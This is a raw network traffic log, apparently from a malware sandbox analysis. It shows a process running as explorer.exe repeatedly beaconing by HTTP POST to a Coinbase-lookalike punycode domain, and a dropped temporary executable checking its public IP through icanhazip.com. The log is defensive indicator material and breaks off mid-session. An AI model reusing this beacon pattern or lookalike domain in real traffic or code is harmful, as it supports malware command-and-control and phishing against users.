Jul 6, 2024 13:28:22.393238068 CEST	625	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WpG5saD3cCUty2c4WMEQ3yQfwEWV6Bym%2FQsV6k6BeZzY5eGp%2FOL%2FpLUMOMccaOE%2BwvANWZ06c43dTg4epAEVPn1%2FHU%2BXU5El3jCaEIZsB00Qw7j4PsL72pysNoJcI%2Fc6ZVJOgYlIcu0rrJ0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40391fef42a1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49849	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:22.525957108 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:22.531734943 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:23.797530890 CEST	613	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gpp0QoxhvWSKTQDf1ROsO5oEe3nFjRy8rELhzAkgDNzgUMbHJoenRDYkmFwEx5q8Mgm2CiRn4SZXINlVXj2yHJh5kd8x0yPDTAZayqBe7nY1mMW4pRu9PqAmhVWinFg2XOYqRUUwBO%2F3ryQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef403f6872431f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49850	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:23.914511919 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:23.919540882 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:24.676249981 CEST	615	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zp9xlWKvs6QyOSqojbxYlqGmoj80ECOzdtbRfkU7hbcd9wd953oE4ZdRcPn57qVRdGcVUoxWrbFsLbT3DJiTW2E%2FWj5okLyHu5MH9U0f3jxKVaF8hMYL6XsKS68eHGJwJC7xk%2F9EJA6xItI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4047f9de8c8a-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49851	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:24.804114103 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:24.809154034 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:25.557785988 CEST	625	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y2%2BSwHt%2BWxnhjdd3oOZENzULPlXifwqBKvD2UXqR69c2I49%2FS2U%2FJgKSucZLfxMbq9J1%2BfphXle6TuBwC7lf77ZvjbS%2B0TbweGOB4tzqwQ5SxufR46Br48VMvCYOX%2FYdmgPcCu3Be48GFBs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef404d9e5b17e1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49854	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:25.683913946 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:25.690489054 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:26.415488005 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=izziIp45bKHg4ohJg2eYtLZQ1QZuTaS13%2FTZMruND0%2BUy8lOvPV5cU4DVZEs6LXeitaEEMIXm3AHKSoMBeSJwoEwNIVmkQZOE1RXiXzmAetzkdEJw%2BlyjJFV9tEK6aBd%2BFwDcaJr%2FaF15rI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40531e915e79-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49855	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:26.543922901 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:26.555844069 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:27.424565077 CEST	625	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BcCTCKyVtFzgeAF8Xae5T2M8kDRAT7cQbKZ3%2FS4b8JK%2B6VL3RnuxTflampZupW6n8EbM3Xlqy4cIDxZ1Sl%2F7KOcgkToWJzuPEcHGBSR3C7GP5wN%2FdjX%2F7j7mPovfTyRF4fs%2BcBbP7vnFDw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40588a3a1879-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49856	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:27.540889978 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:27.545969963 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:28.337816954 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=92qYR07c8jHquo30F8zjC4RZvVFxcq69DIO34L6eASC%2FjeIjJmB9Km%2FgC2CWQSbC6pTLGEnZ%2B%2BepgS76BvEKRGAb0Ghb5jj5WhLIGrlpoN3oBY2yBTr9Ee1Pp4F7VGUzwT8pWbPg8uSekNM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef405ecfa44240-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49860	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:28.461699009 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:28.466675997 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:30.128591061 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4qvCFXhVvaZohCkjPxvkiLzl3m5DOE%2BimcPzrkPC%2BVWJPNP4V4RacLZeuYDMQ70UTG0iNKHCxHUMgW8uQY%2BnYqmIVMR63emPHn6GSqWPXoSx9msjtLRkgUXfeAheKR2gnhxIeV5m4L%2FWK8Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40647a5e42ca-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49864	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:30.242759943 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:30.247777939 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:30.961313963 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BZJytN%2Bco6EXNnt84R5lUSdu6Zd3uia3LmSvfdprkCmVW1cBWtN%2Baa3qUWLgH%2BySPGCIxPOUy%2F7jT%2BGj91C0X7NnUMlmjaNVzmMsXf7V8iqwntsxWxpiqnHZYeaizOidfsEc562rFD3k9Wo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef406faff60f3d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49867	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:31.071362972 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:31.076598883 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:31.908749104 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ow0CqHmn9bcYupGwqzJTTRg%2FbbmyHidQVWtYHeT7xHBs%2FPdS0%2FEWlbQEZgtJBW89mc6R7azJzTxHiSYs6nrKeCYeqfKkO%2FQECWbalJy7MLsOft49Hg1i2TL4nwysnyDcyt%2BXMtjrvySlpyQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4074cd2e437f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49870	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:32.180434942 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:32.185480118 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:32.938951969 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TI4cBUB8VCyDzkAGEukyDAsSCwbNfKlGFM8k6hMcHYfrzA2ES%2BEzwdm%2F7aUXOxoNurye761pJRaZTaZfRIT3KbARB%2FGNxoWVUgOQFn02YZ6Z1Mlh6gNWwGk7vAW4U9MOYxzBDfd46v%2Fq3xQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef407babc31821-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49871	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:33.057733059 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:33.062560081 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:33.806818008 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EUkNLoWXpdqqfRkywF6yTT4p0UI7jzlHGnIF3iDBEFXoDtCdRCF9ql3DOiwzYRUNtEvc7GnbqSJ8%2BqC3YelQbhaM5VLwbt9W1Cv%2FD%2BNEOEMHlKbDdwzhzqLYkFimyKLjuuDf6c%2BArMLOpqg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4081394d0f36-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49873	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:33.931746006 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:33.939966917 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:34.772316933 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lQAu%2F9zI8LY5PC3IohTYZWehdyfXRiJtV%2BHBqjcmqUOEC%2FTGUWyJAW7ZSIMrEbNfikVRQtdg4qII7uiOxZw1yIwEReaJGpw2EBKgo7gXMs8lx%2F8EORkU1dwR12mY94AWspslpzsk3m0stTM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4086bd6a0f39-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49875	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:35.333379030 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:35.338249922 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:36.336802006 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hDGCho4fsLZYjEMvgNK0AJi%2BFFgLcPzEAEt9HCC8wVeHVveP%2BP3f%2F9rwCHQoyuJjvP6sdEXiXJ7Z74p8u8JuENZBimGM0jEck34Bhmk5k%2FlpgbYnfAbOD0TLQVzRjoHbhQS5goZ11vZrjoQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef408f8c5a72a7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jul 6, 2024 13:28:36.337852001 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hDGCho4fsLZYjEMvgNK0AJi%2BFFgLcPzEAEt9HCC8wVeHVveP%2BP3f%2F9rwCHQoyuJjvP6sdEXiXJ7Z74p8u8JuENZBimGM0jEck34Bhmk5k%2FlpgbYnfAbOD0TLQVzRjoHbhQS5goZ11vZrjoQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef408f8c5a72a7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49877	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:36.461673021 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:36.468810081 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:37.172996044 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9LssfI9cMQ1FqRBl7gQSWund9mED3QdQOiJv2n6h8x006Cs95RVND3bA1wqve2CCZVncv36IJlVUd%2Fl6jBdy2WrF7sIAqke%2FItqaZCuT68nFWm0DZaVmNmFyIr1lHj2ntNVYbOB%2FzP43N8M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40968847c35d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49878	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:37.292021990 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:37.300781965 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:38.015081882 CEST	615	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UEAGuWETlvXKrSwSAH88A1Xh7F0BSahHr0EMF6jOfoy7fvU3iNkNF3OU1K9c2k1iu4e%2B3dZuMvG37LXvChgaufjXHnzg1J8Rfi0uLuWlOyfypQ6nUeIP2gijrMu%2BSqKZoTNB0z7rrArO9uw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef409bba998c36-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49879	104.16.184.241	80	5720	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:37.860553026 CEST	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jul 6, 2024 13:28:38.344912052 CEST	534	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:38 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=pXXqrygNoLCpqeC3Untmk3YzSeWRaQj2rwEOCMqhKwI-1720265318-1.0.1.1-EY9pYnVY98Oh9As0kbdPGVbZnOnuKys15BCoDWag.kKkj9GxI4.h1zu2dSK9gkS8BPq9pt..F0NOy3f6WBnHDQ; path=/; expires=Sat, 06-Jul-24 11:58:38 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 89ef409f4b131a3c-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49881	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:38.134119034 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:38.139416933 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:38.892610073 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=voIwS1kA2k%2BmqDyLxZnO9XmSj1Ct5wMu73%2FENyC0FaMT9grQqf6mPUehmOQe%2BLOonvwcotvYNqViZJsezIu%2Ff6QdehrJEVc0sHDVFMb0X%2BCjDI5TdaAfgEz3ooG6EqQYw742gVJnDpOfsKA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40a0fc5c19bf-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49884	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:39.235518932 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:39.240536928 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:40.039648056 CEST	631	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pR%2Br%2BbyeG1J%2BIrCv4toEeogtjoT%2FO8L%2FmV7JaMz2o4P51SxV%2FnXeYQln%2B4kaxUPVXIc%2F93kD6W4fb9bav4PjSxOiwfNvkx%2BNBKKcR%2FFxknX4c2n6MAhNeT7W5xZ6gesozyoQ5ZHMs3zsaeA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40a7de81198e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49886	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:40.168982029 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:40.179739952 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:44.063422918 CEST	613	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w6OLWEvMetwF5NcOYKvPAZUoUoWM5OuMYcT%2BPD72ksc9NCI8Ed8Ep1d02PAUA0K2zXknOdBhPFd6ekZKbNuSz7GfKPNxJOIHBb67LaRmP2pklCeIW5kQjgn8QJ4pXVGx0dUNTaTl6xpoiiM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40adbbc07286-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
